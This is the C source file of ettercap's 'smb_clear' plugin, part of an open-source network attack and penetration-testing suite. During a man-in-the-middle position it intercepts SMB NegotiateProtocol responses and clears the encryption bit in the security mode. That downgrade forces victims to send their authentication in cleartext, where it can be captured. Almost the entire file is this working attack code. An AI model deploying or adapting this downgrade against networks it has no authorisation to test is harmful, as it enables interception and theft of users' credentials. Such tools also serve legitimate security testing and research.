1 /*
2 smb_clear -- ettercap plugin -- Tries to force SMB cleartext auth.
3
4 Copyright (C) ALoR & NaGA
5
6 This program is free software; you can redistribute it and/or modify
7 it under the terms of the GNU General Public License as published by
8 the Free Software Foundation; either version 2 of the License, or
9 (at your option) any later version.
10
11 This program is distributed in the hope that it will be useful,
12 but WITHOUT ANY WARRANTY; without even the implied warranty of
13 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 GNU General Public License for more details.
15
16 You should have received a copy of the GNU General Public License
17 along with this program; if not, write to the Free Software
18 Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
19
20 */
21
22
23 #include <ec.h> /* required for global variables */
24 #include <ec_plugins.h> /* required for plugin ops */
25 #include <ec_packet.h>
26 #include <ec_hook.h>
27
28
29 typedef struct {
30 u_char proto[4];
31 u_char cmd;
32 u_char err[4];
33 u_char flags1;
34 u_short flags2;
35 u_short pad[6];
36 u_short tid, pid, uid, mid;
37 } SMB_header;
38
39 typedef struct {
40 u_char mesg;
41 u_char flags;
42 u_short len;
43 } NetBIOS_header;
44
45
46 /* protos */
47 int plugin_load(void *);
48 static int smb_clear_init(void *);
49 static int smb_clear_fini(void *);
50
51 static void parse_smb(struct packet_object *po);
52
53 /* plugin operations */
54
55 struct plugin_ops smb_clear_ops = {
56 /* ettercap version MUST be the global EC_VERSION */
57 .ettercap_version = EC_VERSION,
58 /* the name of the plugin */
59 .name = "smb_clear",
60 /* a short description of the plugin (max 50 chars) */
61 .info = "Tries to force SMB cleartext auth",
62 /* the plugin version. */
63 .version = "1.0",
64 /* activation function */
65 .init = &smb_clear_init,
66 /* deactivation function */
67 .fini = &smb_clear_fini,
68 };
69
70 /**********************************************************/
71
72 /* this function is called on plugin load */
plugin_load(void * handle)73 int plugin_load(void *handle)
74 {
75 return plugin_register(handle, &smb_clear_ops);
76 }
77
78 /******************* STANDARD FUNCTIONS *******************/
79
smb_clear_init(void * dummy)80 static int smb_clear_init(void *dummy)
81 {
82 /* variable not used */
83 (void) dummy;
84
85 /* It doesn't work if unoffensive */
86 if (EC_GBL_OPTIONS->unoffensive) {
87 INSTANT_USER_MSG("smb_clear: plugin doesn't work in UNOFFENSIVE mode\n");
88 return PLUGIN_FINISHED;
89 }
90
91 USER_MSG("smb_clear: plugin running...\n");
92
93 hook_add(HOOK_PROTO_SMB, &parse_smb);
94 return PLUGIN_RUNNING;
95 }
96
97
smb_clear_fini(void * dummy)98 static int smb_clear_fini(void *dummy)
99 {
100 /* variable not used */
101 (void) dummy;
102
103 USER_MSG("smb_clear: plugin terminated...\n");
104
105 hook_del(HOOK_PROTO_SMB, &parse_smb);
106 return PLUGIN_FINISHED;
107 }
108
109 /*********************************************************/
110
111 /* Clear the encryption bit in the SecurityModel request */
parse_smb(struct packet_object * po)112 static void parse_smb(struct packet_object *po)
113 {
114 SMB_header *smb;
115 NetBIOS_header *NetBIOS;
116 u_char *ptr;
117 char tmp[MAX_ASCII_ADDR_LEN];
118
119 /* It is pointless to modify packets that won't be forwarded */
120 if (!(po->flags & PO_FORWARDABLE))
121 return;
122
123 /* Catch netbios and smb headers */
124 NetBIOS = (NetBIOS_header *)po->DATA.data;
125 smb = (SMB_header *)(NetBIOS + 1);
126 /* Let's go to the data */
127 ptr = (u_char *)(smb + 1);
128
129 /* According to the Hook Point we are sure that this is
130 * a NegotiateProtocol response packet.
131 * Now we can change the Security Mode
132 * 010 (encrypted) 000 (plaintext)
133 */
134 if (ptr[3] & 2) {
135 ptr[3] ^= 2;
136 USER_MSG("smb_clear: Forced SMB clear text auth %s -> ", ip_addr_ntoa(&po->L3.src, tmp));
137 USER_MSG("%s\n", ip_addr_ntoa(&po->L3.dst, tmp));
138 po->flags |= PO_MODIFIED;
139 }
140 }
141
142 /* EOF */
143
144 // vim:ts=3:expandtab
145
146